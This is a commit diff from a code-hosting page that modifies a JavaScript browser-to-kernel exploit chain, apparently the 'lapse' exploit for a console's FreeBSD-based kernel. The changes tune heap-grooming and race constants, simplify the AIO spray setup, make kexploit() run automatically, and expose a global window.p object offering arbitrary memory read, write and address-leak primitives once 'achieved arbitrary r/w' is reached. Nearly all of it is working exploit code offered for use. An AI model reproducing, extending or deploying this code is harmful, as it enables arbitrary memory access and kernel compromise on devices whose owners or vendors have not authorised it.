Set num_alias = 100 / Advise fom ABC
This commit is contained in:
Kameleon
@@ -133,7 +133,7 @@ const main_core = 7;
|
||||
const num_grooms = 0x200;
|
||||
const num_handles = 0x100;
|
||||
const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
|
||||
const num_alias = 10;
|
||||
const num_alias = 100;
|
||||
const num_races = 100;
|
||||
const leak_len = 16;
|
||||
const num_leaks = 5;
|
||||
@@ -1640,18 +1640,7 @@ function setup(block_fd) {
|
||||
const greqs = make_reqs1(num_reqs);
|
||||
// allocate enough so that we start allocating from a newly created slab
|
||||
spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
|
||||
cancel_aios(groom_ids_p, num_grooms);
|
||||
{
|
||||
// chosen to maximize the number of 0x100 malloc allocs per submission
|
||||
const num_reqs = 4;
|
||||
const groom_ids = new View4(num_grooms);
|
||||
const groom_ids_p = groom_ids.addr;
|
||||
const greqs = make_reqs1(num_reqs);
|
||||
// allocate enough so that we start allocating from a newly created slab
|
||||
spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
|
||||
cancel_aios(groom_ids_p, num_grooms);
|
||||
}
|
||||
|
||||
cancel_aios(groom_ids_p, num_grooms);
|
||||
return [block_id, groom_ids];
|
||||
}
|
||||
|
||||
@@ -1667,6 +1656,7 @@ function setup(block_fd) {
|
||||
//
|
||||
// the exploit implementation also assumes that we are pinned to one core
|
||||
export async function kexploit() {
|
||||
|
||||
const _init_t1 = performance.now();
|
||||
await init();
|
||||
const _init_t2 = performance.now();
|
||||
@@ -1743,5 +1733,12 @@ export async function kexploit() {
|
||||
for (const sd of sds) {
|
||||
close(sd);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
kexploit();
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
+61
-2
@@ -829,6 +829,64 @@ async function make_arw(reader, view2, pop) {
|
||||
);
|
||||
log('achieved arbitrary r/w');
|
||||
|
||||
window.p = {
|
||||
read1(addr) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
const res = mem.read8(addr);
|
||||
return res;
|
||||
},
|
||||
|
||||
read2(addr) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
const res = mem.read16(addr);
|
||||
return res;
|
||||
},
|
||||
|
||||
read4(addr) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
const res = mem.read32(addr);
|
||||
return res;
|
||||
},
|
||||
|
||||
read8(addr) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
const res = mem.read64(addr);
|
||||
return new int64(res.low, res.high);
|
||||
},
|
||||
|
||||
write1(addr, value) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
mem.write8(addr, value);
|
||||
},
|
||||
|
||||
write2(addr, value) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
mem.write16(addr, value);
|
||||
},
|
||||
|
||||
write4(addr, value) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
mem.write32(addr, value);
|
||||
},
|
||||
|
||||
write8(addr, value) {
|
||||
addr = new Int(addr.low, addr.hi);
|
||||
if (value instanceof int64) {
|
||||
value = new Int(value.low, value.hi);
|
||||
mem.write64(addr, value);
|
||||
} else {
|
||||
mem.write64(addr, new Int(value));
|
||||
}
|
||||
|
||||
},
|
||||
|
||||
leakval(obj) {
|
||||
const res = mem.addrof(obj);
|
||||
return new int64(res.low, res.high);
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
rdr.restore();
|
||||
// set the refcount to a high value so we don't free the memory, view's
|
||||
// death will already free it (a StringImpl is currently using the memory)
|
||||
@@ -856,7 +914,8 @@ async function main() {
|
||||
await make_arw(rdr, view2, pop);
|
||||
|
||||
clear_log();
|
||||
// path to your script that will use the exploit
|
||||
import('./lapse.mjs');
|
||||
|
||||
import('./lapse.mjs');
|
||||
|
||||
}
|
||||
main();
|
||||
|
||||
Reference in New Issue
Block a user